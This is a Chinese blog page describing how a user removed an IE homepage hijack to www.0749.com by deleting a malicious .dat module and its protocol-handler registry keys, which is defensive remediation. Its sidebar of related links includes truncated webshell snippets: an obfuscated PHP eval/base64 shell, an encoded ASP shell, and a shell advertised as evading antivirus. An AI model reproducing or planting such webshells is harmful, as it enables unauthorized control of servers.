解决主页变成www.0749.com

最新推荐文章于 2024-04-28 04:25:13 发布
最新推荐文章于 2024-04-28 04:25:13 发布
阅读量4.1w 收藏 1
点赞数
分类专栏: windows 文章标签: 2010 金山 internet windows 浏览器 工具
本文介绍了一种主页被劫持的情况及其解决方案。通过检测注册表、MBR等未发现异常,最终通过Xuetr工具发现了可疑模块3348201013.dat,并给出了手动及自动清除步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:社区一用户反映主页被劫持,安全工具均无效~ 步骤:首先查了下注册表,不见www.0749.com 然后检测mbr,未见异常,排除鬼影变种可能 在接下来查看快捷方式属性和插件,均未见异常。 额,让我想想。传了个xuetr过去,看看加载的模块,发现在iexplorer.exe进程下有一个3348201013.dat模块,看了下路径,在 C盘Internet Explorer文件夹下。 之后检查注册表,删除http协议劫持,搞定~ 所以解决方案如下 自动解决方案:下载使用金山系统急救箱或者金山卫士或者金山网盾来一键修复。 手动方案:关闭浏览器,然后删除c:/program files/Internet Explorer/3348201013.dat (当然如果你的是新变种可能是其他的名字,一般都是数字.dat) 开始——运行,输入regedit打开注册表编辑器,找到这几个键值删除 [HKEY_CLASSES_ROOT/CLSID/{33482013-2010-1095-951B-9EA34E34E8CC}] @="Windows HttpFilter" "AppID"="{73A7FFA7-AA3A-49E5-A777-713B7DB78E9C}" [HKEY_CLASSES_ROOT/CLSID/{33482013-2010-1095-951B-9EA34E34E8CC}/InprocServer32] @="3348201013.dat" HKEY_CLASSES_ROOT/PROTOCOLS/Name-Space Handler这个里面的http和about下让他都是空的就可以,把里面的都删掉就行,当然我这次遇到的如下,需要查找 {33482013-2010-1095-951B-9EA34E34E8CC}然后把CLSID下的这个也删掉。查找这个可以通过搜索“3348201013.dat” 定位。 [HKEY_CLASSES_ROOT/PROTOCOLS/Name-Space Handler/about/{33482013-2010-1095-951B-9EA34E34E8CC}] "CLSID"="{33482013-2010-1095-951B-9EA34E34E8CC}" [HKEY_CLASSES_ROOT/PROTOCOLS/Name-Space Handler/http/{33482013-2010-1095-951B-9EA34E34E8CC}] "CLSID"="{33482013-2010-1095-951B-9EA34E34E8CC}" 然后就喝杯咖啡歇着吧 为了您的安全,请只打开来源可靠的网址 打开网站 取消 来自: http://hi.baidu.com/hw2619/blog/item/8f21ac2775cd48188a82a1af.html
juzhenzhuanzhi.rar_site:www.pudn.com
09-19
转置一个矩阵,就是将其所有行变为列,或所有列变为行。假设我们有一个m×n的矩阵A,其转置矩阵记为A^T,那么A^T的第i行第j列的元素就是原矩阵A的第j行第i列的元素。 矩阵转置的程序通常会涉及循环结构,如for或...
自动跳转到www.0749.com网页问题
leyvan的专栏
11-12 29万+
所以解决方案如下 自动解决方案:下载使用金山系统急救箱或者金山卫士或者金山网盾来一键修复
认识网站优化中的404以及注意事项
xx1655730209的博客
10-31 340
一、认识死链接:     死链接就是无效不存在的错误路径,在网站建设中的专业术语。常显示404、403、503状态等。 通常在网站中突然删除一个文件内容等,使用原来的路径打开就会出现错误。 如:http://www.SEOpz.com/seozixun/1830.html网址,当1830这个文件被删除或者移动到了位置,打开这个网址就 会出现错误成为死链。这个时候就需要给网站添加4
必看链接
Celebrity_Senior的博客
11-30 1034
1、通过分析 JDK 源代码研究 Hash 存储机制 http://www.cnblogs.com/Qian123/p/5703179.html2、ZooKeeper的安装、配置、启动和使用 http://www.2cto.com/os/201503/386161.html3、dubbo的安装和使用 http://www.tuicool.com/articles/QjaArm 4、dubbo-adm
本人网站永久域名!
逍遥行工作室
09-08 25万+
最新消息,本站启用永久域名,欢迎大家常来做客 O(∩_∩)O~     目前我的网站子域名如下 主站:http://www.yangping.net 博客:http://blog.yangping.net 论坛:http://bbs.yangping.net 网盘:http://disk.yangping.net
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 92万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
judage.rar_BBB judage_site:www.pudn.com
09-19
2. **构建反向链表**:创建一个与原链表相反的链表,即第一个字符变为最后一个,最后一个字符变为第一个,以此类推。 3. **比较链表**:遍历两个链表(原始链表和反向链表),逐个比较对应节点的字符。如果所有字符...
高斯列主元素消去法(C++).rar_site:www.pudn.com_高斯消去法c++
09-22
- `www.pudn.com.txt`:可能是一个包含网站链接或者项目说明的文本文件。 - `hw_1.cpp`:这是实际的C++源代码文件,其中实现了高斯列主元素消去法的算法。 在`hw_1.cpp`文件中,开发者可能定义了一个或多个函数来...
ppp.rar_256ppp_WWW.PPP.COM_www.ppp256_www.ppp256com_全色免费PPp
09-23
标题中的"ppp.rar_256ppp_WWW.PPP.COM_www.ppp256_www.ppp256com_全色免费PPp"暗示了一个与图像处理相关的项目或软件,其中包含了256ppp的关键词,这通常意味着将图像从真彩色转化为256种颜色的索引彩色模式。...
Jingyu.zip_http://www.jingyu_词法分析
09-21
词法分析程序是独立的一遍,把字符流的源程序变为单词序列,输出到一个中间文件,这个文件作为语法分析程序的输入而继续编译过程。该词法分析程序的功能是输入源程序,按照构词规则分解成一系列的单词符号,包括...
在HTML中使用正则表达式规范输入数据
08-12
NULL 博文链接:https://leaf-stop.iteye.com/blog/2279377
Centos Docker部署教程_docker部署centos
最新发布
2401_84281655的博客
04-28 869
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
www.zhsws.com/admin.php,WebShell/DJ团队.asp at master · xl7dev/WebShell · GitHub
weixin_36238982的博客
04-01 64万+
#@~^d24BAA==]/2Kxk+R~E6W+MPxYMEn@#@&rx,3DMWD,]n/!:PH+aO,@#@&/D.AzfxE@!/m.raY~VmUTECT+{\4kmMrwDP.ElOxk+D7nD@*J@#@&dOD~bG'dY.$zf'J&WP"+5;/YcErJ'm^rxOhlk/hKD9'JrJb@!@*JEErPK4nx,?+kdrW`rJ:...
chrome打开新页面都是打开http://www.94994.com/?thunder
蒗若晨曦
07-22 4万+
习惯用chrome,什么功能都可以自己定制,定制虽然麻烦,但用起来还爽,所以还是愿意地。 可是今天早上当天开新页面时,却每次都是打了http://www.94994.com/?thunder这个地址,我开始以为是迅雷引起的,害得把绿色的迅雷也卸了,还是不行。我上午搜索了一下,原来是“迅雷、快车、旋风专用链自动转换”引起的,这个一直用的都很好,怎么突然就会多一个这东西,真不爽!,从网上找了一下处理
过检大马下载webshell,360,安全狗。。。
weixin_74245209的博客
11-10 11万+
上传利器phpwebshell提权 关注我获取更多资源 <?php $password = "68xi";//设置密码 error_reporting(E_ERROR); header("content-Type: text/html; charset=gb2312"); set_time_limit(0); function Root_GP(&$array) { while(list($key,$var) = each($array)) {
12306抢票使用教程
百载文枢江左的博客
12-28 5475
12306抢票使用教程准备工作第一步 下载项目源代码第二步 筛选CDN第三步 下载依赖库第四步 填入火车票信息填入乘车日期填入出发城市填入到达城市填入座位填入乘车人填入账号密码选择本地打码下载chrome驱动设置邮件提醒的发件人和收件人(可不设置)设置微信提醒(可不设置)第五步 开始抢票常见问题如何选择学生票示例的TickerConfig.py的配置 本教程为testerSunshine的开源项目...
getSupportFragmentManager().beginTransaction().add(R.id.container, new PlaceholderFragment()).commit
Lenny的专栏
02-05 7062
http://www.cxyclub.cn/n/47419/
MySQL性能优化的21个最佳实践 和 mysql使用索引
weixin_33824363的博客
04-07 173
1. 为查询缓存优化查询  当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查询就不用操作表而直接访问缓存结果了。 2. EXPLAIN   SELECT 查询 使用 EXPLAIN 关键字可以知道MySQL是如何处理SQL语句的。这可以查询语句或是表结构的性能瓶颈。 EXPLAIN 的查询结果还会索引主键被如何利用的,数据表是如何被搜索和排序的……...
sgu 231 打表+二分 水过~~
weixin_33881140的博客
10-01 671
/* * sgu231.c * * Created on: 2011-10-1 * Author: bjfuwangzhu */#include<stdio.h>#include<string.h>#include<stdlib.h>#include<math.h>#define nmax 8169int num[nmax] = {5...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值